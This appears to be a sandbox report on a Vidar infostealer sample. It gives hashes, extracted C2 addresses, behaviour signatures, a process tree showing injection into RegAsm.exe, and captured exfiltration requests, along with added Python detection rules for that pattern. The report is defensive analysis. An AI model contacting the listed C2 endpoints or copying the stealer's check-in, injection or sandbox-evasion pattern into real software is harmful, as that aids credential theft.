Analysis

  • max time kernel
    92s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16/09/2024, 13:40 UTC

General

  • Target

    file.exe

  • Size

    283KB

  • MD5

    5c984dd83c65ae6b6f2d93a60ae40bfd

  • SHA1

    1ec1891c37d87fc565d93557a6b4d08da151badb

  • SHA256

    e4c2d3c019cf5161619d1f6ef5a76d7fb68f0cc9d4b0d004653e38bff42edf19

  • SHA512

    5f09ec740cd62c0ad5c94d53fbb8444e388ef4cf54ba4d12f1a7916048327ff3b9cd3d8cbd54d4678bacf178a93a35662b6ddf82c8049d199366ceac32c52ed9

  • SSDEEP

    6144:cf2UKkk1T+5pKHhU7mncSw2DND25SL3ttU3NAYTYsCmK0vEO:0juCeHe7mcMD25g3ttdSYsCpCEO

Malware Config

Extracted

Family

vidar

C2

https://t.me/edm0d

https://steamcommunity.com/profiles/76561199768374681

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0

Signatures

  • Detect Vidar Stealer 5 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3472
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      PID:4828
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      PID:5004
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 2296
        3⤵
        • Program crash
        PID:232
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5004 -ip 5004
    1⤵
    PID:4616
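The process tree above is the concrete shape of the hollowing pattern the Signatures section describes: file.exe runs from the user's Temp directory, carries the SetThreadContext and WriteProcessMemory signatures, and starts RegAsm.exe twice with no arguments (RegAsm.exe does nothing useful without an assembly path), and the second RegAsm.exe instance later crashes into WerFault.exe. The following Python is an added example, not tria.ge's code or part of the report: it turns that pattern into a triage rule over a process list. The records are constructed from the tree above, the field names are not tria.ge's schema, and the list of hollowing host binaries is an assumption.

```python
"""Process-tree triage for the hollowing pattern in this report.

Added example, not tria.ge code. Records are constructed from the report's
process tree; the field names and HOLLOW_HOSTS list are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from ntpath import basename  # Windows path semantics regardless of host OS


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int | None            # None: parent not captured in the tree
    image: str
    cmdline: str
    signatures: tuple[str, ...] = ()


# Signed Microsoft .NET utilities commonly used as hollowing hosts by loaders
# (assumed list; RegAsm.exe is the one this report shows).
HOLLOW_HOSTS = {
    "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe",
    "applaunch.exe", "aspnet_compiler.exe", "vbc.exe", "csc.exe",
}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\users\\public\\")
INJECT_APIS = {"Suspicious use of SetThreadContext",
               "Suspicious use of WriteProcessMemory"}

# Constructed from the Processes section of the report.
TREE = [
    Proc(3472, None, r"C:\Users\Admin\AppData\Local\Temp\file.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\file.exe"',
         ("Suspicious use of SetThreadContext",
          "System Location Discovery: System Language Discovery",
          "Suspicious use of WriteProcessMemory")),
    Proc(4828, 3472, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    Proc(5004, 3472, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
         r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
         ("System Location Discovery: System Language Discovery",
          "Checks processor information in registry",
          "Suspicious behavior: EnumeratesProcesses")),
    Proc(232, 5004, r"C:\Windows\SysWOW64\WerFault.exe",
         r"C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 2296", ("Program crash",)),
    Proc(4616, None, r"C:\Windows\SysWOW64\WerFault.exe",
         r"C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5004 -ip 5004"),
]


def argless(p: Proc) -> bool:
    """True when the command line is only the (optionally quoted) image path."""
    return p.cmdline.strip().strip('"').lower() == p.image.lower()


def crash_target(p: Proc) -> int | None:
    """PID named by WerFault.exe's -p switch, or None if p is not WerFault."""
    if basename(p.image).lower() != "werfault.exe":
        return None
    m = re.search(r"-p\s+(\d+)", p.cmdline)
    return int(m.group(1)) if m else None


def triage(procs: list[Proc]) -> list[tuple[int, str]]:
    """Flag argument-less hollowing hosts with a suspicious parent, then link crashes to them."""
    by_pid = {p.pid: p for p in procs}
    findings: list[tuple[int, str]] = []
    hollowed: set[int] = set()
    for p in procs:
        parent = by_pid.get(p.ppid) if p.ppid is not None else None
        if parent is None or basename(p.image).lower() not in HOLLOW_HOSTS or not argless(p):
            continue
        reasons = []
        if INJECT_APIS <= set(parent.signatures):
            reasons.append("parent uses SetThreadContext+WriteProcessMemory")
        if any(marker in parent.image.lower() for marker in USER_WRITABLE):
            reasons.append("parent image lives in a user-writable path")
        if reasons:
            hollowed.add(p.pid)
            findings.append((p.pid, f"{basename(p.image)} started with no arguments by pid "
                             f"{parent.pid}: " + "; ".join(reasons)))
    # WerFault names the crashing process by PID; the image it reports is the host
    # (RegAsm.exe) even though the code that faulted is the injected payload.
    for p in procs:
        target = crash_target(p)
        if target in hollowed:
            findings.append((p.pid, f"WerFault.exe crash report for hollowed pid {target}"))
    return findings


if __name__ == "__main__":
    for pid, why in triage(TREE):
        print(f"pid {pid}: {why}")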

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dns.google
      • flag-us
        DNS
        t.me
        RegAsm.exe
        Remote address:
        8.8.8.8:53
        Request
        t.me
        IN A
        Response
        t.me
        IN A
        149.154.167.99
      • flag-nl
        GET
        https://t.me/edm0d
        RegAsm.exe
        Remote address:
        149.154.167.99:443
        Request
        GET /edm0d HTTP/1.1
        Host: t.me
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Mon, 16 Sep 2024 13:40:10 GMT
        Content-Type: text/html; charset=utf-8
        Content-Length: 12286
        Connection: keep-alive
        Set-Cookie: stel_ssid=4a318142128895f6fe_6710074133564402445; expires=Tue, 17 Sep 2024 13:40:10 GMT; path=/; samesite=None; secure; HttpOnly
        Pragma: no-cache
        Cache-control: no-store
        X-Frame-Options: ALLOW-FROM https://web.telegram.org
        Content-Security-Policy: frame-ancestors https://web.telegram.org
        Strict-Transport-Security: max-age=35768000
      • flag-us
        DNS
        209.205.72.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        209.205.72.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        240.143.123.92.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.143.123.92.in-addr.arpa
        IN PTR
        Response
        240.143.123.92.in-addr.arpa
        IN PTR
        a92-123-143-240.deploy.static.akamaitechnologies.com
      • flag-us
        DNS
        99.167.154.149.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        99.167.154.149.in-addr.arpa
        IN PTR
        Response
      • flag-de
        GET
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:10 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-us
        DNS
        24.249.124.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        24.249.124.192.in-addr.arpa
        IN PTR
        Response
        24.249.124.192.in-addr.arpa
        IN PTR
        cloudproxy10024.sucuri.net
      • flag-us
        DNS
        72.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        72.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        73.254.107.91.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        73.254.107.91.in-addr.arpa
        IN PTR
        Response
        73.254.107.91.in-addr.arpa
        IN PTR
        static.73.254.107.91.clients.your-server.de
      • flag-de
        POST
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Content-Length: 255
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:11 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        POST
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Content-Length: 331
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:11 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        POST
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDH
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Content-Length: 331
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:12 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        POST
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Content-Length: 332
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:12 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        POST
        https://91.107.254.73/
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Content-Length: 4637
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:13 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        GET
        https://91.107.254.73/sqlp.dll
        RegAsm.exe
        Remote address:
        91.107.254.73:443
        Request
        GET /sqlp.dll HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
        Host: 91.107.254.73
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Mon, 16 Sep 2024 13:40:13 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: keep-alive
      • flag-us
        DNS
        196.249.167.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        196.249.167.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        13.86.106.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        13.86.106.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        183.59.114.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.59.114.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        198.187.3.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        198.187.3.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        18.134.221.88.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.134.221.88.in-addr.arpa
        IN PTR
        Response
        18.134.221.88.in-addr.arpa
        IN PTR
        a88-221-134-18.deploy.static.akamaitechnologies.com
      Connection summary (address, domain or URL, protocols, process, bytes out, bytes in, packets out, packets in, request and response):

      149.154.167.99:443  https://t.me/edm0d              tls, http  RegAsm.exe  1.5kB  19.4kB  24  20  GET https://t.me/edm0d -> 200
      91.107.254.73:443   https://91.107.254.73/          tls, http  RegAsm.exe  1.0kB  2.7kB   11   8  GET https://91.107.254.73/ -> 200
      91.107.254.73:443   https://91.107.254.73/          tls, http  RegAsm.exe  1.4kB  622 B    9   6  POST https://91.107.254.73/ -> 200
      91.107.254.73:443   https://91.107.254.73/          tls, http  RegAsm.exe  1.5kB  2.2kB   10   7  POST https://91.107.254.73/ -> 200
      91.107.254.73:443   https://91.107.254.73/          tls, http  RegAsm.exe  1.7kB  6.4kB   13  10  POST https://91.107.254.73/ -> 200
      91.107.254.73:443   https://91.107.254.73/          tls, http  RegAsm.exe  1.5kB  672 B    9   6  POST https://91.107.254.73/ -> 200
      91.107.254.73:443   https://91.107.254.73/          tls, http  RegAsm.exe  5.9kB  565 B   12   6  POST https://91.107.254.73/ -> 200
      91.107.254.73:443   https://91.107.254.73/sqlp.dll  tls, http  RegAsm.exe  1.0kB  1.0kB    8   5  GET https://91.107.254.73/sqlp.dll -> 404
      8.8.8.8:53          8.8.8.8.in-addr.arpa            dns        -           66 B   90 B     1   1  DNS request 8.8.8.8.in-addr.arpa
      8.8.8.8:53          t.me                            dns        RegAsm.exe  50 B   66 B     1   1  DNS request t.me -> 149.154.167.99
      8.8.8.8:53          209.205.72.20.in-addr.arpa      dns        -           72 B   158 B    1   1  DNS request 209.205.72.20.in-addr.arpa
      8.8.8.8:53          240.143.123.92.in-addr.arpa     dns        -           73 B   139 B    1   1  DNS request 240.143.123.92.in-addr.arpa
      8.8.8.8:53          99.167.154.149.in-addr.arpa     dns        -           73 B   166 B    1   1  DNS request 99.167.154.149.in-addr.arpa
      8.8.8.8:53          24.249.124.192.in-addr.arpa     dns        -           73 B   113 B    1   1  DNS request 24.249.124.192.in-addr.arpa
      8.8.8.8:53          72.32.126.40.in-addr.arpa       dns        -           71 B   157 B    1   1  DNS request 72.32.126.40.in-addr.arpa
      8.8.8.8:53          95.221.229.192.in-addr.arpa     dns        -           73 B   144 B    1   1  DNS request 95.221.229.192.in-addr.arpa
      8.8.8.8:53          73.254.107.91.in-addr.arpa      dns        -           72 B   129 B    1   1  DNS request 73.254.107.91.in-addr.arpa
      8.8.8.8:53          196.249.167.52.in-addr.arpa     dns        -           73 B   147 B    1   1  DNS request 196.249.167.52.in-addr.arpa
      8.8.8.8:53          13.86.106.20.in-addr.arpa       dns        -           71 B   157 B    1   1  DNS request 13.86.106.20.in-addr.arpa
      8.8.8.8:53          183.59.114.20.in-addr.arpa      dns        -           72 B   158 B    1   1  DNS request 183.59.114.20.in-addr.arpa
      8.8.8.8:53          198.187.3.20.in-addr.arpa       dns        -           71 B   157 B    1   1  DNS request 198.187.3.20.in-addr.arpa
      8.8.8.8:53          18.134.221.88.in-addr.arpa      dns        -           72 B   137 B    1   1  DNS request 18.134.221.88.in-addr.arpa
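The request sequence above is the Vidar check-in in full: a GET to the dead-drop profile listed in the extracted config (t.me/edm0d), then a GET, a run of multipart/form-data POSTs and a request for sqlp.dll (answered 404) to a bare IP, 91.107.254.73, that never appears in any DNS A answer in the capture, all sent with a macOS Opera User-Agent from a Windows host. The Python below is an added example, not part of the report or tria.ge's code: it encodes those observations as detection rules and runs them over request records constructed from the capture above. The timings, field names and dead-drop host list are assumptions; the *.in-addr.arpa PTR queries in the capture are the sandbox's own reverse lookups and are deliberately not counted as resolution of the C2.

```python
"""Vidar-style check-in detection over captured HTTP requests.

Added example, not tria.ge code. Request records are constructed from the
capture in the report; timings, field names and DEAD_DROP_HOSTS are assumptions.
"""
from __future__ import annotations

import ipaddress
from collections import Counter
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Http:
    t: float                 # seconds since the first request (constructed)
    method: str
    url: str
    user_agent: str = ""
    content_type: str = ""
    status: int = 0


# Public profile pages the stealer reads to find its live C2 (dead-drop
# resolvers); both hosts appear in the extracted config. Assumed list.
DEAD_DROP_HOSTS = {"t.me", "steamcommunity.com"}

MAC_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0")
C2 = "https://91.107.254.73/"

# Constructed from the request list in the report; the t.me GET carried no User-Agent.
EVENTS = [
    Http(0.0, "GET", "https://t.me/edm0d", status=200),
    Http(0.4, "GET", C2, MAC_UA, status=200),
    Http(1.0, "POST", C2, MAC_UA, "multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC", 200),
    Http(1.3, "POST", C2, MAC_UA, "multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC", 200),
    Http(2.0, "POST", C2, MAC_UA, "multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDH", 200),
    Http(2.4, "POST", C2, MAC_UA, "multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF", 200),
    Http(3.0, "POST", C2, MAC_UA, "multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE", 200),
    Http(3.2, "GET", C2 + "sqlp.dll", MAC_UA, status=404),
]
# A records the sample itself resolved. The *.in-addr.arpa PTR queries in the
# capture are the sandbox's reverse lookups and are deliberately left out.
DNS_A = {"t.me": {"149.154.167.99"}}


def ua_os(ua: str) -> str:
    """Operating system a User-Agent string claims to run on."""
    if "Windows NT" in ua:
        return "Windows"
    if "Macintosh" in ua:
        return "macOS"
    if "Android" in ua or "Linux" in ua:
        return "Linux"
    return "unknown"


def public_ip_literal(host: str) -> bool:
    """True for a globally routable IP address used directly as the HTTP host."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return False


def triage(events, dns_a, host_os="Windows", window=60.0, burst=3):
    """Return (rule, subject) findings, each emitted once."""
    resolved = {ip for answers in dns_a.values() for ip in answers}
    findings: list[tuple[str, str]] = []

    def hit(rule: str, subject: str) -> None:
        if (rule, subject) not in findings:
            findings.append((rule, subject))

    last_drop: float | None = None
    posts: Counter[str] = Counter()
    c2_hosts: set[str] = set()
    for e in sorted(events, key=lambda x: x.t):
        host = urlsplit(e.url).hostname or ""
        if e.method == "GET" and host in DEAD_DROP_HOSTS:
            last_drop = e.t
            hit("dead_drop_lookup", e.url)
        if public_ip_literal(host) and host not in resolved:
            # Hard-coded or dead-drop-derived C2: the address never came from DNS.
            hit("unresolved_ip", host)
            c2_hosts.add(host)
        if e.user_agent and ua_os(e.user_agent) not in ("unknown", host_os):
            hit("ua_os_mismatch", e.user_agent)
        if e.method == "POST" and e.content_type.startswith("multipart/form-data"):
            posts[host] += 1
            if posts[host] >= burst and last_drop is not None and e.t - last_drop <= window:
                hit("exfil_burst", host)
        if e.method == "GET" and host in c2_hosts and e.url.lower().endswith(".dll"):
            # Helper DLL pulled from the C2 after the uploads (GET /sqlp.dll here).
            hit("dll_fetch_from_c2", e.url)
    return findings


if __name__ == "__main__":
    for rule, subject in triage(EVENTS, DNS_A):
        print(f"{rule:18} {subject}")
```

The rules are written for proxy or EDR HTTP logs rather than raw packet captures: the User-Agent, Content-Type and URL path are only visible where TLS is terminated or inspected, whereas the dead-drop lookup and the connection to an IP that no DNS answer produced can be taken from DNS and flow logs alone.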

      MITRE ATT&CK Enterprise v15

      Downloads

      • memory/3472-0-0x0000000074B7E000-0x0000000074B7F000-memory.dmp  (Filesize: 4KB)
      • memory/3472-1-0x0000000000980000-0x00000000009CA000-memory.dmp  (Filesize: 296KB)
      • memory/3472-2-0x0000000005870000-0x0000000005E14000-memory.dmp  (Filesize: 5.6MB)
      • memory/3472-12-0x0000000074B70000-0x0000000075320000-memory.dmp  (Filesize: 7.7MB)
      • memory/3472-27-0x0000000074B70000-0x0000000075320000-memory.dmp  (Filesize: 7.7MB)
      • memory/5004-4-0x0000000000400000-0x0000000000657000-memory.dmp  (Filesize: 2.3MB)
      • memory/5004-9-0x0000000000400000-0x0000000000657000-memory.dmp  (Filesize: 2.3MB)
      • memory/5004-7-0x0000000000400000-0x0000000000657000-memory.dmp  (Filesize: 2.3MB)
      • memory/5004-24-0x0000000000400000-0x0000000000657000-memory.dmp  (Filesize: 2.3MB)
      • memory/5004-25-0x0000000000400000-0x0000000000657000-memory.dmp  (Filesize: 2.3MB)
